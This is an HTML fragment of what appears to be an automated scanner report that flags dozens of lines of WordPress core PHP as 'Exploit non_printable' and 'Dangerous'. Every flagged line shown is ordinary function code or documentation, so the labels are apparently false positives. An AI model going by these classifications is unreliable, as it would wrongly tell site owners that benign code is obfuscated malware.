</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 823</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$content</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8250</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ip_prefix </span><span style="color: #007700">. </span><span style="color: #0000BB">$ip_addr</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8254</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns uniform </span><span style="color: #DD0000">"anonymous" </span><span style="color: #0000BB">data by type</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8260</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The anonymous data </span><span style="color: #007700">for </span><span style="color: #0000BB">the requested type</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8262</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_privacy_anonymize_data</span><span style="color: #007700">( </span><span style="color: #0000BB">$type</span><span style="color: #007700">, </span><span style="color: #0000BB">$data </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8299</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">'wp_privacy_anonymize_data'</span><span style="color: #007700">, </span><span style="color: #0000BB">$anonymous</span><span style="color: #007700">, </span><span style="color: #0000BB">$type</span><span style="color: #007700">, </span><span style="color: #0000BB">$data </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8303</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns the directory used to store personal data export files</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8309</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string Exports directory</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8311</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_privacy_exports_dir</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8324</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">'wp_privacy_exports_dir'</span><span style="color: #007700">, </span><span style="color: #0000BB">$exports_dir </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8328</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns the URL of the directory used to store personal data export files</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8334</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string Exports directory URL</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8336</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_privacy_exports_url</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 833</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">[] Array </span><span style="color: #0000BB">of URLs found in passed string</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8349</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">'wp_privacy_exports_url'</span><span style="color: #007700">, </span><span style="color: #0000BB">$exports_url </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8357</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_schedule_delete_old_privacy_export_files</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 835</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_extract_urls</span><span style="color: #007700">( </span><span style="color: #0000BB">$content </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8378</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_privacy_delete_old_export_files</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8418</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string URL to learn more about updating PHP</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8420</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_get_update_php_url</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8444</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$update_url</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8450</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to retrieve this URL</span><span style="color: #007700">. </span><span style="color: #0000BB">Instead</span><span style="color: #007700">, use {@</span><span style="color: #0000BB">see wp_get_update_php_url</span><span style="color: #007700">()} </span><span style="color: #0000BB">when relying on the URL</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8451</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">does not allow modifying the returned URL</span><span style="color: #007700">, and </span><span style="color: #0000BB">is only used to compare the actually used URL with the</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8457</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string </span><span style="color: #007700">Default </span><span style="color: #0000BB">URL to learn more about updating PHP</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8459</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_get_default_update_php_url</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8460</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">_x</span><span style="color: #007700">( </span><span style="color: #DD0000">'https://wordpress.org/support/update-php/'</span><span style="color: #007700">, </span><span style="color: #DD0000">'localized PHP upgrade information page' </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8466</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is to be used after </span><span style="color: #007700">{@</span><span style="color: #0000BB">see wp_get_update_php_url</span><span style="color: #007700">()} </span><span style="color: #0000BB">to display a consistent</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8475</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">the markup</span><span style="color: #007700">. Default `</span><span style="color: #DD0000">true</span><span style="color: #007700">` for echo.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8479</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_update_php_annotation</span><span style="color: #007700">( </span><span style="color: #0000BB">$before </span><span style="color: #007700">= </span><span style="color: #DD0000">'<p class="description">'</span><span style="color: #007700">, </span><span style="color: #0000BB">$after </span><span style="color: #007700">= </span><span style="color: #DD0000">'</p>'</span><span style="color: #007700">, </span><span style="color: #0000BB">$display </span><span style="color: #007700">= </span><span style="color: #0000BB">true </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8486</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$before </span><span style="color: #007700">. </span><span style="color: #0000BB">$annotation </span><span style="color: #007700">. </span><span style="color: #0000BB">$after</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8492</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns the </span><span style="color: #007700">default </span><span style="color: #0000BB">annotation </span><span style="color: #007700">for </span><span style="color: #0000BB">the web hosting altering the </span><span style="color: #DD0000">"Update PHP" </span><span style="color: #0000BB">page URL</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8494</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is to be used after </span><span style="color: #007700">{@</span><span style="color: #0000BB">see wp_get_update_php_url</span><span style="color: #007700">()} </span><span style="color: #0000BB">to </span><span style="color: #007700">return </span><span style="color: #0000BB">a consistent</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8499</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string Update PHP page annotation</span><span style="color: #007700">. </span><span style="color: #0000BB">An </span><span style="color: #007700">empty </span><span style="color: #0000BB">string </span><span style="color: #007700">if </span><span style="color: #0000BB">no custom URLs are provided</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8501</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_get_update_php_annotation</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8515</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$annotation</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8521</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returned </span><span style="color: #007700">if </span><span style="color: #0000BB">the </span><span style="color: #007700">`</span><span style="color: #DD0000">WP_DIRECT_UPDATE_PHP_URL</span><span style="color: #007700">` </span><span style="color: #0000BB">environment variable is specified </span><span style="color: #007700">or</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8527</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string URL </span><span style="color: #007700">for </span><span style="color: #0000BB">directly updating PHP </span><span style="color: #007700">or empty </span><span style="color: #0000BB">string</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8529</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_get_direct_php_update_url</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8545</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$direct_update_url</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8553</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returned by </span><span style="color: #007700">`</span><span style="color: #DD0000">wp_get_direct_php_update_url()</span><span style="color: #007700">`.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8557</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_direct_php_update_button</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 855</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function ( </span><span style="color: #0000BB">$link </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8585</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string URL to learn more about updating to HTTPS</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8587</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_get_update_https_url</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 859</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">str_replace</span><span style="color: #007700">( </span><span style="color: #DD0000">';'</span><span style="color: #007700">, </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$link </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8616</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to retrieve this URL</span><span style="color: #007700">. </span><span style="color: #0000BB">Instead</span><span style="color: #007700">, use {@</span><span style="color: #0000BB">see wp_get_update_https_url</span><span style="color: #007700">()} </span><span style="color: #0000BB">when relying on the URL</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8623</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string </span><span style="color: #007700">Default </span><span style="color: #0000BB">URL to learn more about updating to HTTPS</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8625</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_get_default_update_https_url</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8627</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">__</span><span style="color: #007700">( </span><span style="color: #DD0000">'https://developer.wordpress.org/advanced-administration/security/https/' </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8633</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returned </span><span style="color: #007700">if </span><span style="color: #0000BB">the </span><span style="color: #007700">`</span><span style="color: #DD0000">WP_DIRECT_UPDATE_HTTPS_URL</span><span style="color: #007700">` </span><span style="color: #0000BB">environment variable is specified </span><span style="color: #007700">or</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8639</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string URL </span><span style="color: #007700">for </span><span style="color: #0000BB">directly updating to HTTPS </span><span style="color: #007700">or empty </span><span style="color: #0000BB">string</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8641</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_get_direct_update_https_url</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 865</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">array_values</span><span style="color: #007700">( </span><span style="color: #0000BB">$post_links </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8663</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that is used primarily to check whether</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8672</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">int</span><span style="color: #007700">|</span><span style="color: #0000BB">false</span><span style="color: #007700">|</span><span style="color: #0000BB">null Size in bytes </span><span style="color: #007700">if </span><span style="color: #0000BB">a valid directory</span><span style="color: #007700">. </span><span style="color: #0000BB">False </span><span style="color: #007700">if </span><span style="color: #0000BB">not</span><span style="color: #007700">. </span><span style="color: #0000BB">Null </span><span style="color: #007700">if </span><span style="color: #0000BB">timeout</span><span style="color: #007700">.</span>
</span>
